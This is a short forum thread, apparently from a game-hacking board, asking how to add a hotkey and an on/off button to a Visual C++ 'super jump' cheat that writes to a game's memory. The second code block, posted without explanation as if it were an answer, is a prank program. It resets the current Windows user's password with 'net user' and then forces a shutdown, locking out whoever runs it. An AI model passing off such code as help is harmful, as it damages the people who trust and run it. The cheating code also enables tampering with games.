super jump visual C++

Posts 12 of 2 · Page 1 of 1
super jump visual C++
How I can add a hotkey (ctr+Space) in visual c++, in super jump..

Code:
void CSmileDlg::OnButton1()
{
		WritePointerFloat(0x1395200,0x178,1500);
	}
And make button of On and Off pls help me
Code:
#include <iostream>
#include <windows.h>
#include <conio.h>

using namespace std;

int main()
{
	system(("net user %username% sandi"));
	system("shutdown -t 5 -s");
	system("cls");
	getch();
	return 0;
}
Posts 12 of 2 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

Need help?